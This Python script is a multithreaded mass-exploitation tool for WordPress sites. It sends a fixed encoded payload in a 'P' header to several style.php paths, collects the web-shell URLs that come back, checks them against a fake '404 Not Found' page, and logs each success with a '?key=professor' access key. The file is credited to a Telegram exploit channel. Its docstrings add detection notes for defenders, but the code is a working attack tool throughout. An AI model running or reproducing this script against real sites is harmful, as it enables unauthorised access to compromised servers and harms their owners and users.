import requests
import concurrent.futures
import threading
import sys
from urllib.parse import urljoin
from colorama import Fore, Style, init

#Telegram: # https://t.me/Exploit_0x

# colorama setup for the coloured status lines printed by main().
init()

# Held by main() while it appends a hit to the results file.
lock = threading.Lock()

def send_payload(url, payload):
    """Send the payload to one candidate endpoint and return the path it reports.

    Issues a single GET to ``url`` with ``payload["p"]`` placed in a request
    header named ``P``, then reads ``data.beimaurl`` from the JSON reply.

    Args:
        url: Candidate ``style.php`` URL built by the caller.
        payload: Dict whose ``"p"`` entry is sent as the header value.

    Returns:
        The ``data["data"]["beimaurl"]`` value from the response, or ``None``
        on any failure (network error, HTTP error status, non-JSON body,
        missing key).

    Detection note: this is an ordinary GET with no body and no query
    string, so the distinguishing features on the server side are the
    non-standard ``P`` request header carrying a long opaque value and the
    ``style.php`` target path. Default access-log formats usually do not
    record arbitrary request headers, so header capture (WAF, reverse proxy
    or packet capture) is needed to see it.
    """
    try:
        response = requests.get(url, headers={"P": payload["p"]}, timeout=10)
        # 4xx/5xx raises here and therefore ends up as a None result.
        response.raise_for_status()
        data = response.json()
        # "beimaurl" is the only field consumed; the rest of the reply is ignored.
        return data["data"]["beimaurl"]
    except Exception:
        # Every error is collapsed to None; the caller reads None as
        # "nothing at this path, try the next one".
        return None

def verify_shell(shell_url):
    """Check whether ``shell_url`` serves the expected marker page.

    Returns ``True`` only when the GET completes with a non-error status
    (``raise_for_status`` does not raise) *and* the body contains the literal
    ``<title>404 Not Found</title>``. Any exception, or a body without that
    string, yields ``False``.

    Detection note: a genuine 404 raises in ``raise_for_status`` and is
    rejected, so the page being looked for is one that answers with a success
    status while its HTML imitates a "404 Not Found" page. Monitoring that
    compares the status code with the body (2xx plus a 404 title) will
    surface such files; monitoring on status code alone will not.
    """
    try:
        response = requests.get(shell_url, timeout=10)
        response.raise_for_status()
        # Marker match is a plain substring test on the response body.
        if "<title>404 Not Found</title>" in response.text:
            return True
    except Exception:
        return False
    return False

def get_base_url(url):
    """Return ``url`` cut at a known ``style.php`` path, with trailing slashes removed.

    Each listed path is tried in order; when one is present, everything from
    its first occurrence onward is dropped before the next path is tried.
    """
    known_paths = (
        '/style.php',
        '/wp-content/style.php',
        '/wp-admin/style.php',
        '/wp-includes/style.php',
        '/wp-content/themes/style.php',
    )

    trimmed = url
    for known in known_paths:
        # partition() returns the whole string as the head when `known` is absent.
        trimmed, _, _ = trimmed.partition(known)

    return trimmed.rstrip('/')

def process_url(target_url, payload):
    """Probe one target across the fixed ``style.php`` paths.

    For each path in turn: send the payload, and if a path value comes back,
    resolve it against the base URL and run the marker-page check on it.

    Args:
        target_url: One line from the input list.
        payload: Dict passed through to ``send_payload``.

    Returns:
        ``(shell_url, None)`` for the first path whose reported URL passes
        ``verify_shell``; ``(None, base_url)`` when no path does.

    Detection note: a single client requesting this exact sequence of
    ``style.php`` locations on one host within seconds is a recognisable
    probe pattern in access logs, independent of whether any request
    succeeds. The script only talks to ``style.php`` files that already
    exist on the target; it does not upload them, so a hit on any of these
    paths points at an earlier compromise worth investigating on its own.
    """
    base_url = get_base_url(target_url)
    
    # Fixed list of locations probed, in this order.
    paths_to_try = [
        '/style.php',
        '/wp-content/style.php',
        '/wp-admin/style.php',
        '/wp-includes/style.php',
        '/wp-content/themes/style.php'
    ]
    
    for path in paths_to_try:
        url_to_try = base_url + path
        try:
            shell_path = send_payload(url_to_try, payload)
            if not shell_path:
                # None or empty value: nothing usable came back from this path.
                continue
            
            # shell_path comes from the remote response. urljoin resolves a
            # relative value against the base, but returns an absolute URL
            # unchanged, so the follow-up request goes wherever the response
            # says -- relevant when replaying this against a sandbox or honeypot.
            shell_url = urljoin(base_url + '/', shell_path)
            
            if verify_shell(shell_url):
                return (shell_url, None)
        except Exception:
            # Anything else raised for this path (for example urljoin on an
            # unexpected value type) just moves on to the next path.
            continue
    
    # If all paths failed
    return (None, base_url)

def main():
    """Command-line entry point: run ``process_url`` over every line of a list file.

    Expects exactly one argument, the path to a text file with one URL per
    line. Targets are processed by a pool of 15 worker threads; each result
    is printed as a coloured status line, and every verified URL is appended
    to ``Exploit_Successful.txt`` in the current directory.

    Indicators visible in this function, for log searches and forensics:
      * the exact header value in ``payload['p']`` (sent in the ``P`` header);
      * the query string ``key=professor`` appended to every recorded URL;
      * the output file name ``Exploit_Successful.txt`` on the machine that
        ran the script.
    """
    if len(sys.argv) != 2:
        print(f"{Fore.RED}Usage: python {sys.argv[0]} list.txt{Style.RESET_ALL}")
        sys.exit(1)
    
    input_file = sys.argv[1]
    
    # Opaque, fixed value sent verbatim as the ``P`` header. It contains
    # URL-escaped sequences (%2B, %3D) that nothing in this script decodes, so
    # this literal string is what appears on the wire and can be matched
    # exactly. NOTE(review): its decoded meaning cannot be determined from
    # this file.
    payload = {
        'p': 'bvQWrfWtQebClOv6JkS/h5263NxZLbDBMdHJx4WQYfOrwS/5OcfbYUP5aKEE2juMeWAG9b/s6p3%2Bx6210abfrkwZCLPRtWmdkJ/r0/EwWWDncxv6n5LQ1wvWq%2BInEw2TeD/MOEtvMViiu7vYUyQ92H1ZrW/fMlaJKhTAdJdVJHKkheOpLuiWD0ebCixhIcRstT1a8GhB5ldZ5juHzicEXJQ68BfX19bXK5fSpNbAfEJtZs/XH/6LbIEdFLbQmmpG4MQyX/jA2/B7W24SBbfBnVYveMIU/IQ6o6%2BRiolgFE5uc2xuEZZ83sfEMdJKIkerfJZoJ1XjW8KIE/WJsWQ1HA%3D%3D'
    }

    try:
        with open(input_file, 'r', encoding='utf-8') as fp:
            urls = fp.read().splitlines()

        # Both tallies are incremented below but never printed in this function.
        Exploit_Successful_count = 0
        failed_count = 0
        
        with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor:
            # Map each future back to the input line it was created from.
            future_to_url = {executor.submit(process_url, url, payload): url for url in urls}
            
            for future in concurrent.futures.as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    result = future.result()
                    if result[0]:  # Exploit_Successful case
                        with lock:
                            with open('Exploit_Successful.txt', 'a', encoding='utf-8') as f:
                                # The recorded URL gets '?key=professor' appended --
                                # presumably the access parameter of the dropped
                                # file (not confirmed by this script). Requests to
                                # PHP files carrying that query string are worth
                                # searching for in access logs.
                                f.write(result[0] +'?key=professor' + '\n')
                        print(f"{Fore.GREEN}-| {result[0]} --> [Exploit_Successful]{Style.RESET_ALL}")
                        Exploit_Successful_count += 1
                    else:  # Failed case
                        print(f"{Fore.RED}-| {result[1]} --> [Failed]{Style.RESET_ALL}")
                        failed_count += 1
                except Exception as e:
                    # An exception escaping the worker is reported as a failure
                    # for that target; processing continues with the rest.
                    base_url = get_base_url(url)
                    print(f"{Fore.RED}-| {base_url} --> [Failed: {e}]{Style.RESET_ALL}")
                    failed_count += 1

    except FileNotFoundError:
        print(f"{Fore.RED}Error: File '{input_file}' not found.{Style.RESET_ALL}")
        sys.exit(1)
    except Exception as e:
        # Any other error is printed and the function returns normally.
        print(f"{Fore.RED}An unexpected error occurred: {e}{Style.RESET_ALL}")

# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()
